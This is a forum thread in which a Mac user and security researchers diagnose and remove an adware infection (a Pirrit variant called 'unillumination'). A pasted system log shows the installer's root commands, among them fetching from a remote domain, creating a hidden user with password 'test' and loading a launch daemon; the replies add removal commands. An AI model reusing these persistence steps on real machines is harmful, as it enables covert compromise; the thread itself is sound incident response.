What is 'unillumination' process Mavericks?

[Kitu]

Hi All,

This new process appeared 1 week ago when I was away on vacation using a mobile USB device to connect. That device has been just fine for 6 years, and only ever used a couple of times a year (in the same place) when I find myself in the boondocks. No neighbours there, and no WiFi anywhere around.

Old MBP with Mavericks.

LittleSnitch started kicking off asking for permissions to connect to sites with addresses consisting of all kinds of longs strings of rubbish. Being paranoid I said no. Then, as it was getting insistent, I completely blocked the process, and all ok since then - even back home on a good connection.

However, what's really spooky is I can find not 1 reference to this process searching on Google, and now Adobe Lightroom (properly licensed and working) is stalling and not performing at all.

If it's a kosher process, why on earth are there zero references to it on Google ?

It's also a process that re-spawns the moment it's closed in Activity Monitor. I've added a screenshot below in case it helps - and I am *not* Tarquin.

Anybody have a clue?

Many TIA.

 

[Weaselboy]

http://tarquin.sourceforge.net/index.php

Hmm... odd. I have never heard of that process either. Does this Tarquin app link ring any bells for you maybe?

Select the process in Activity Monitor then hit command-i to get info on the process. Then look in the open files and ports and see what files it is using. That should give you some clue where this is coming from.

If that does not solve it for you, run the app Etrecheck to create an anonymized report of everything running and the related launch locations. You can post that report here for us to take a look.

 

[Kitu]

Hi Weaselboy.
I did find the Tarquin software link, but it's some specialist medical software, so way out of my area. Also, this just appeared 1 week ago when I was on a very slow connection (and I mean slower than dial-up) - happily.

I'll take a look at Etrecheck, and meanwhile here's a view on what other processes are flagged to user 'Tarquin' in case any of it makes sense.

Thanks!

[doublepost=1459896720][/doublepost]p.s. Here is a copy of the Library contents for it in case it rings any bells.

I am far from being a coder, so maybe the contents might mean something to you or others ?

 

[Weaselboy]

https://github.com/fs/dropsend-direct-build-mac/tree/master/Contents/PlugIns

Dr. Google is coming up with a lot of hits for this app that contains those files. Mean anything to you?

Did you try the get info then check open ports and files related to that process in Activity Monitor?

Did you install any new apps or anything you can think of around midnight on March 31?

 

[Kitu]

Thanks. That looks like a file-sharing App.
What I am certain of is that I didn't install anything at all that day/night, as my connection speed is that slow I wouldn't even attempt it.

I blocked all incoming & outgoing traffic from that process in Little Snitch as soon as it started requesting all sorts of connections including the URL mentioned below; so it can't communicate now.

I have checked the system log, and below is a paste of what happened at that time. The zero install injector has basically installed this stuff by calling it from a URL. More info at: http://www.ubuntugeek.com/zero-inst...tware-easily-and-without-root-privileges.html

Whatever it's up to, it certainly doesn't look healthy to me. Also, I am denied access to the folder /var/Tarquin despite being an Administrator.

Am tempted to delete all records in Library, and any other reference I can find. However, will hang on a bit in case you/anyone else would like more info'.

Do the log entries help ?


31/03/2016 00:36:16.629 sudo[18352]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod 777 /var/tmp/DemoInjector07122015/install_Injector.sh
31/03/2016 00:36:16.646 sudo[18354]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/var/tmp/DemoInjector07122015/install_Injector.sh A2016 id http://aa8780bb28a1de4eb5bff33c28a218a930.com
31/03/2016 00:36:17.734 sudo[18376]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.common.plist name unillumination
31/03/2016 00:36:17.798 sudo[18378]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.common.plist pref com.unillumination.preferences.plist
31/03/2016 00:36:17.801 com.apple.WebKit.Networking[285]: CFNetwork SSLHandshake failed (-9806)
31/03/2016 00:36:17.843 sudo[18380]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.common.plist net_pref com.unillumination.net-preferences.plist
31/03/2016 00:36:17.869 sudo[18382]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cp -r /var/tmp/DemoInjector07122015/DemoInjector.app /var/tmp/DemoInjector07122015/unillumination
31/03/2016 00:36:17.958 sudo[18384]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cp -r /var/tmp/DemoInjector07122015/unillumination /Library
31/03/2016 00:36:18.445 sudo[18387]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/rm -r /var/tmp/DemoInjector07122015/unillumination
31/03/2016 00:36:19.039 sudo[18389]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cp /var/tmp/DemoInjector07122015/change_net_settings.sh /etc
31/03/2016 00:36:19.054 sudo[18391]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/sbin/chown root /etc/change_net_settings.sh
31/03/2016 00:36:19.310 sudo[18396]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod 755 /etc/change_net_settings.sh
31/03/2016 00:36:19.332 sudo[18399]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod -R 755 /Library/unillumination
31/03/2016 00:36:19.374 sudo[18402]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/mv /Library/unillumination/Contents/MacOS/DemoInjector /Library/unillumination/Contents/MacOS/unillumination
31/03/2016 00:36:20.280 sudo[18420]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.common.plist user_id Tarquin
31/03/2016 00:36:20.351 sudo[18422]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/dscl . -create /Users/Tarquin UniqueID 401
31/03/2016 00:36:21.628 sudo[18435]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/dscl . -create /Users/Tarquin PrimaryGroupID 20
31/03/2016 00:36:21.688 sudo[18437]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/dscl . -create /Users/Tarquin NFSHomeDirectory /var/Tarquin
31/03/2016 00:36:21.777 sudo[18439]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/dscl . -create /Users/Tarquin UserShell /bin/bash
31/03/2016 00:36:21.780 com.apple.launchd[1]: System: ��&P�[18440] disappeared out from under us (UID: 0 EUID: 0)
31/03/2016 00:36:21.858 sudo[18446]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/dscl . -create /Users/Tarquin RealName User Tarquin
31/03/2016 00:36:21.921 sudo[18448]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/dscl . -passwd /Users/Tarquin test
31/03/2016 00:36:22.648 sudo[18451]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/mkdir /var/Tarquin
31/03/2016 00:36:22.683 sudo[18453]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/sbin/chown -R Tarquin /var/Tarquin
31/03/2016 00:36:22.703 sudo[18455]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod a+rwx /Library/unillumination/Contents/MacOS/unillumination
31/03/2016 00:36:22.718 sudo[18457]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.apple.loginwindow Hide500Users -bool YES
31/03/2016 00:36:22.844 sudo[18462]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cp /var/tmp/DemoInjector07122015/com.pref.preferences.plist /Library/Preferences/com.unillumination.preferences.plist
31/03/2016 00:36:22.860 sudo[18464]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/sbin/chown root /Library/Preferences/com.unillumination.preferences.plist
31/03/2016 00:36:22.876 sudo[18466]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.unillumination.preferences.plist dist_channel_id A2016
31/03/2016 00:36:22.899 sudo[18468]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.unillumination.preferences.plist machine_id 7C07CE52-8F62-5C83-B9A1-A4479EF65628
31/03/2016 00:36:22.922 sudo[18470]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.unillumination.preferences.plist click_id id
31/03/2016 00:36:22.945 sudo[18472]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.unillumination.preferences.plist domain http://aa8780bb28a1de4eb5bff33c28a218a930.com
31/03/2016 00:36:22.968 sudo[18474]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/plutil -convert xml1 /Library/Preferences/com.unillumination.preferences.plist
31/03/2016 00:36:23.847 sudo[18490]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cp /var/tmp/DemoInjector07122015/com.pref.net-preferences.plist /Library/LaunchDaemons/com.unillumination.net-preferences.plist
31/03/2016 00:36:23.862 sudo[18492]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod 755 /Library/LaunchDaemons/com.unillumination.net-preferences.plist
31/03/2016 00:36:23.874 sudo[18494]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/launchctl load -w /Library/LaunchDaemons/com.unillumination.net-preferences.plist
31/03/2016 00:36:23.956 sudo[18498]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults read /Library/Preferences/com.common.plist name
31/03/2016 00:36:23.977 sudo[18500]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults read /Library/Preferences/com.common.plist user_id
31/03/2016 00:36:34.011 sudo[18563]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/sbin/pfctl -evf /etc/pf_proxy.conf
31/03/2016 00:36:34.038 sudo[18565]: root : TTY=unknown ; PWD=/ ; USER=Tarquin ; COMMAND=/Library/unillumination/Contents/MacOS/unillumination
31/03/2016 00:36:35.688 xpcd[18584]: Info.plist does not contain an XPCService dictionary: /System/Library/Frameworks/Security.framework/XPCServices/SecurityAgent.xpc

 

[Weaselboy]

This is pretty scary. I think you are right about what happened, but I can't see how it would be able to execute that install injector script without you providing an admin password. It looks like that install injector script pulled everything down from that web site a couple lines down. You can see the URL there. I found this info related to that URL. Not good.

The script even made a hidden user called Tarquin with the password "test". Look in your /Users folder and see if it is there. I suspect you can't see it. Read this. If you reboot that hidden user will not appear in the login screen and it won't appear in Users & Groups.

Run this command in Terminal (you will be asked for your password) and it should show the Tarquin user there.

sudo du -d 1 -x -c -g /Users

The whole thing is being launch by this line in /Library/LaunchDaemons/. If you go to that folder and delete the plist and reboot, it should kill it.

/Library/LaunchDaemons/com.unillumination.net-preferences.plist

Before you do that though, please try the get info from Activity Monitor like I suggested just to see what else it is running.

I have never ever seen anything like this. At this point, I think it is safe to say your machine is completely compromised and I would pull off your data and erase the entire disk and reinstall the OS, then manually reinstall your apps and move your data back manually.

Can you use something like CCC to make a clone of the entire disk and set it aside first? I think there are others who may be interested in looking further into this for you.

I'm going to ping a couple forum members here to ask them to throw an eye on this also.

 

[Kitu]

Many thanks - and no, user Tarquin doesn't show up.

* please try the get info from Activity Monitor like I suggested just to see what else it is running.
Embarrassed to say I'm not sure how to do this. I can see the processes running under user Tarquin as posted earlier, but don't see anything else dodgy running.

LittleSnitch is doing a good job of keeping the animal caged. It's trying to connect to 2 websites at the same IP address;

1. thecloudservices.net
Which virus total flags 3 times for malware

2. http://cloudservices.targetingedge.netdna-cdn.com/
Which virus total reckons is clean.

Happily I caught this & blocked the connections while away on the mobile internet. However, where I was staying is on a national border, so the connection is very weak & slow, meaning that uploading anything meaningful would take forever.

A full reinstall now is a scary prospect, but I'll give that some thought, and perhaps start with deleting what I can find as you suggest.
What really puzzles me is how this got in. I'm naturally very cautious (hence LittleSnitch), and never crash around clicking everything in sight. All very odd.

 

[Weaselboy]

Many thanks - and no, user Tarquin doesn't show up.

Even with that Terminal command I gave you? Because you definitely have that user account on there and it has full access to your system.

This command in Terminal should show the account.

sudo dscl . list /Users

This command will delete the account.

sudo dscl . delete /Users/Tarquin

* please try the get info from Activity Monitor like I suggested just to see what else it is running.

Embarrassed to say I'm not sure how to do this. I can see the processes running under user Tarquin as posted earlier, but don't see anything else dodgy running.

Np problem... here is what you do. Start Activity Monitor and select that unilluminated process with your mouse like I did with CalendarAgent in my screenshot. Now click the i in the tool bar just above that. It will bring up a window like my bottom screenshot. Click to the Open Files and Ports tab of the window. That will show all files that the unilluminated process is using.

 

[Kitu]

* Even with that Terminal command I gave you?
I confess I didn't try that, as cagey about entering my system password with something nasty lurking on the machine. That probably doesn't make sense, but that's how cautious I've been.

* Activity Monitor
Now I see the problem. I only have 2 tabs - Memory & Statistics; no 'Open Files And Ports' tab. I'm using v10.9.2, and haven't updated as it will disable some of my important software. Maybe that's why I don't have that tab?

Whatever, many thanks for the tips. You have given me enough to hopefully get rid of the user & the plist.

Will hang on though in case there's a work-around for my missing tab.

 

[Weaselboy]

* Activity Monitor
Now I see the problem. I only have 2 tabs - Memory & Statistics; no 'Open Files And Ports' tab.

No... that just means that process does not have any other files or ports open. Like this process for example.

Could anybody else have had access to your system to install this? I am still baffled how it got on there if you were doing nothing else at that time. Have you recently installed any new apps that may have carried this malware payload?

 

[Kitu]

I just checked myself, and for other process the tab is there - just not for those being run by Tarquin. Phew.

I am as baffled as you. The only other possibility I can think of is my GF used it for about 20 minutes earlier that day to check her gmail & read the news. She's a PC user though (with 0 knowledge of those) so managed to open a couple of apps in the process, but nothing out of the ordinary.
Nobody else could have had access, or my screen password, which sleeps & locks after 5 minutes.

The only thing I've installed this year (earlier in March) was a Samsung Printer Manager from their site, which was supposedly corrupted so I got rid of it immediately.
Otherwise, my mobile internet dongle is 6 years old, is only used a few times a year on journeys abroad, and has never been used by anyone else.

Very glad that I have LittleSnitch network monitor on, as otherwise I wouldn't have known what was going on, and that process would still be happily communicating with whatever sites it wanted to. And given that it seems to include a file-sharing app, that could have been *bad* !

Am I clear to trash this thing? Or can you think of any other places to check for related nasties ?

 

[Weaselboy]

Am I clear to trash this thing? Or can you think of any other places to check for related nasties ?

Before you ditch it, and while it is still running. Run Etrecheck like I mentioned. That will show all launch and startup items to make sure there is nothing anywhere else besides that /Library/LaunchDaemons/ plist we already know about.

 

[Kitu]

Done - and I like this little App. Fast, and very useful.
It has flagged this as Adware, and found another that I wasn't sure about so was already blocking in LittleSnitch

Adware: ⓘ

/Library/LaunchDaemons/com.edgeshotUpd.plist

/Library/LaunchDaemons/com.unillumination.net-preferences.plist

2 adware files found. [Remove]

And it also flagged up the 2 Launch Daemons.

I shall use Etrecheck to remove them both, and then delete their folders in Library. Might also add the 2 sites it was trying to connect to to Hosts as an extra precaution. Then reboot & hold my breath.

Many thanks indeed for all your support - invaluable. Will let you know if it looks like it was succesful.

 

[KALLT]

A quick web search of ‘DemoInjector’ turned up this recent blog post at Objective-See. It seems to be very similar to a strain of malware identified as OSX.Pirrit. They even offer a shell script at the end to remove it, although I cannot say whether it is applicable to you.

https://objective-see.com/blog/blog_0x0E.html

-- Edit: @Kitu

Based on what you posted above as well as the shell script, you should probably proceed like follows.

1. Check out: /Library/Preferences/com.common.plist (with Quick Look)
   If it only contains entries relating to ‘unillumination’, then remove the file completely (it is not present on my Mavericks installation, so it may have been created by it).
   
   
2. Remove:

   sudo rm -rf /Library/unillumination
   sudo defaults delete /Library/Preferences/com.unillumination.preferences.plist
   sudo rm /etc/change_net_settings.sh
   sudo rm -rf /var/tmp/DemoInjector07122015
   sudo rm -rf /var/Tarquin

3. Unload the launch daemon with:

   sudo launchctl unload -w /Library/LaunchDaemons/com.unillumination.net-preferences.plist
   sudo killall unillumination
   sudo rm /Library/LaunchDaemons/com.unillumination.net-preferences.plist

   
   
4. Remove the user Tarquin with the program Directory Utility (located at /System/Library/CoreServices). Make sure you authenticate yourself (lock in the top-right) then go to “Viewing: Users” and remove the user Tarquin completely. Alternatively, use the command posted by Weaselboy above.
   
   
5. Restore the packet filter:
   

   sudo pfctl -evf /etc/pf.conf

 

[Kitu]

Thanks Kallt.

Think I've got it knocked on the head now though.

I used Etrecheck to remove what it said was Adware, deleted the dodgy User using terminal, and then deleted everything relatedin the Library.

Ran the sudo daily weekly monthly maintenance, and then rebooted. No sign of the process/user anywhere.

Hope that's the end of it, and maybe this thread might help others with the same/similar problems. It's pretty scary to find something going on, but not find *any* reference at all to it on Google.

Cheers again Weaselboy!

 

[KALLT]

Hope that's the end of it, and maybe this thread might help others with the same/similar problems. It's pretty scary to find something going on, but not find *any* reference at all to it on Google.

Probably because it is actually novel. That blog post I linked was literally posted yesterday and the author was notified of this malware last Wednesday. You seem to be one of the earlier victims. Hopefully more will be discovered soon. It is interesting to note that System Integrity Protection would likely not have prevented this, at least not when I see what was affected.

 

[Weaselboy]

A quick web search of ‘DemoInjector’ turned up this recent blog post at Objective-See. It seems to be very similar to a strain of malware identified as OSX.Pirrit.

It does look like the same install method. Odd though that MalWareBytes is aware of unillumination and a Google search turns up nothing... at least for me. It looks very new.

Edit: I see you Ninja posted on me.
[doublepost=1459967113][/doublepost]

Think I've got it knocked on the head now though.

You should still run all the commands listed by KALLT to complete the cleanup. Some of what he posted I don't think the MalWareBytes scan done as part of Etrecheck will cleanup. You can trust him. He is the other forum member I mentioned I was going to ask to take a look at this.

 

[thomasareed]

t's also a process that re-spawns the moment it's closed in Activity Monitor. I've added a screenshot below in case it helps - and I am *not* Tarquin.

That is a variant of VSearch, aka Pirrit, and I see KALLT already pointed out the excellent Objective-See article on this adware.

Fortunately, nasty as it is, it's just adware. It could have been worse, but as it is, once you've removed all the components, you should be fine.

Malwarebytes Anti-Malware for Mac should remove some, if not all, of the components, though I haven't yet run this new variant through its paces and determined whether we need to add anything new to our signatures. If you want to give that a try, you can download it here:

https://malwarebytes.org/antimalware/mac/

It's free, so no need to purchase anything.

I've got a lead on an installer for this variant that I will be playing with shortly, and will update here with the results.

Thomas Reed
Director of Mac Offerings, Malwarebytes

 

[0xAmit]

Hey everyone!
Amit Serper here, I'm the researcher who wrote the article on Objective-see about Pirrit

That post is actually from today and not from yesterday, Patrick Wardle, who owns objective-see.com is in Hawaii, there's a huge time difference. It was posted this morning (where I am, GMT+2) but it was still yesterday's night in Hawaii So it's a pretty fresh post.

First, I have to say that's its really interesting reading this entire thread.
The sample that I researched was given to me by a guy who was hit and had a very similar story to yours. I am just really curious here - can you track how you were infected? The guy who gave me the sample didn't know how he was infected and I had to trace steps and rebuild the malware installer myself. Do you recall installing a flash update or something that's called vInstaller? I'd love to get your input on that either here or on Twitter.com/0xAmit


As for removal instructions - my removal script (linked in the article) should remove the threat. The reason you weren't finding any results in Google about that string you were looking for is because that it was generated on your machine, each infection has a different user and program name - That's actually what made me curious enough to look into it.
[doublepost=1459968175][/doublepost]

That is a variant of VSearch, aka Pirrit, and I see KALLT already pointed out the excellent Objective-See article on this adware.

Fortunately, nasty as it is, it's just adware. It could have been worse, but as it is, once you've removed all the components, you should be fine.

Malwarebytes Anti-Malware for Mac should remove some, if not all, of the components, though I haven't yet run this new variant through its paces and determined whether we need to add anything new to our signatures. If you want to give that a try, you can download it here:

https://malwarebytes.org/antimalware/mac/

It's free, so no need to purchase anything.

I've got a lead on an installer for this variant that I will be playing with shortly, and will update here with the results.

Thomas Reed
Director of Mac Offerings, Malwarebytes

I'd love to get that installer if you want to share

 

[T'hain Esh Kelch]

 

[thomasareed]

I'd love to get that installer if you want to share

Good to meet you, Amit!

I'd be glad to share my sample, although it looks like it's an older variant that doesn't create the hidden user or any of those other interesting things. I'll send you a PM.

 

[Kitu]

Just when you think you've nailed it.... :/

Kallt, thanks for posting the code - and Amit for your article/advice. Now, where to start ?

I have another one that Etrecheck found - 'edgeshotUpd'. I thought I'd got that one back in December. It came posing as MacKeeper, and I immediately realised it was dodgy, so did what I could to get rid of it. No new user name though.

I'm posting a screenshot of the com.common.plist as it includes entries for both of these mongrels.

While looking for more traces of that, I also noticed a folder modified at exactly the time this started, and a sub-folder created at exactly the same time. It's at /var/folders/ per the below snapshot, and the subfolder 'x9' was also created at the same time - 31/3/2016 00:36.

I can't get in there though, as I'm told I have no permissions, despite being setup as Admin.

Is this something you found during your testing? And should it be deleted ?
[doublepost=1459973136][/doublepost]And the attachments of course. BTW, Just realised the edgeshotUpd file has my machine ID, so maybe not a good idea to u/load that one.

[doublepost=1459973769][/doublepost]And the related folders under /var/

 

[0xAmit]

Just when you think you've nailed it.... :/

Kallt, thanks for posting the code - and Amit for your article/advice. Now, where to start ?

I have another one that Etrecheck found - 'edgeshotUpd'. I thought I'd got that one back in December. It came posing as MacKeeper, and I immediately realised it was dodgy, so did what I could to get rid of it. No new user name though.

I'm posting a screenshot of the com.common.plist as it includes entries for both of these mongrels.

While looking for more traces of that, I also noticed a folder modified at exactly the time this started, and a sub-folder created at exactly the same time. It's at /var/folders/ per the below snapshot, and the subfolder 'x9' was also created at the same time - 31/3/2016 00:36.

I can't get in there though, as I'm told I have no permissions, despite being setup as Admin.

Is this something you found during your testing? And should it be deleted ?
[doublepost=1459973136][/doublepost]And the attachments of course. BTW, Just realised the edgeshotUpd file has my machine ID, so maybe not a good idea to u/load that one.

View attachment 625443
[doublepost=1459973769][/doublepost]And the related folders under /var/

View attachment 625447

Whatever ends with Upd ia a variant or pirrit (its also in my research paper). Again, running my script as root should fix your problem. I found some more variants and checked their installation script against my removal script, shouldn't be an issue there. Can you look in /var/tmp and see what's the date thats written next to the word DemoInjector on that folder? Also, please look at your download folder, did you download any cracks or something like that lately? Try to think about what you installed before you were infected.

 

[Kitu]

Amit, I have run all the Terminal commands already, but shall give your script a go tomorrow. Thanks.

Sorry, but I already removed the DemoInjector. However, I pasted some of the system log above (5th post down), and that tells me;

31/03/2016 00:36:16.629 sudo[18352]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod 777 /var/tmp/DemoInjector07122015/install_Injector.sh
31/03/2016 00:36:16.646 sudo[18354]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/var/tmp/DemoInjector07122015/install_Injector.sh A2016 idhttp://aa8780bb28a1de4eb5bff33c28a218a930.com

I am an extremely boring user, so no cracks - and no downloads recently. I have racked my brain on this one, but my connection speed at the time was so slow (think early '90s dial-up) that I wouldn't even have attempted it.
And that was the case from 24/3 to 31/3 when it happened. On 23/3 I was at a hotel with unsecured WiFi access, but even there I did nothing out of the ordinary, and certainly no downloads/installations.
I am baffled, but will keep thinking and come back to you.

Meanwhile, any thoughts on the /var/folders/x9/ screenshot pasted above ? That was created at the very same time as it all kicked off.

 

[Kitu]

Ok, radio silence has ensued.

Weaselboy, I wonder if you can help me with the last unanswered question? being;

"Meanwhile, any thoughts on the /var/folders/x9/ screenshot pasted above ? That was created at the very same time as it all kicked off."

From what I've found searching, these are basically cache files. Some advice says it's ok to delete folders at this level, but other advice says 'don't mess with them'.

Seeing as this folder & contents were created when the adware was installed & started trying to communicate with the outside world - to the second - I can't see that nuking them would do any harm, but would feel a lot more comfortable to get other opinions here.

Thoughts ?

K.

Amit, I have run all the Terminal commands already, but shall give your script a go tomorrow. Thanks.

Sorry, but I already removed the DemoInjector. However, I pasted some of the system log above (5th post down), and that tells me;

31/03/2016 00:36:16.629 sudo[18352]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod 777 /var/tmp/DemoInjector07122015/install_Injector.sh
31/03/2016 00:36:16.646 sudo[18354]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/var/tmp/DemoInjector07122015/install_Injector.sh A2016 idhttp://aa8780bb28a1de4eb5bff33c28a218a930.com

I am an extremely boring user, so no cracks - and no downloads recently. I have racked my brain on this one, but my connection speed at the time was so slow (think early '90s dial-up) that I wouldn't even have attempted it.
And that was the case from 24/3 to 31/3 when it happened. On 23/3 I was at a hotel with unsecured WiFi access, but even there I did nothing out of the ordinary, and certainly no downloads/installations.
I am baffled, but will keep thinking and come back to you.

Meanwhile, any thoughts on the /var/folders/x9/ screenshot pasted above ? That was created at the very same time as it all kicked off.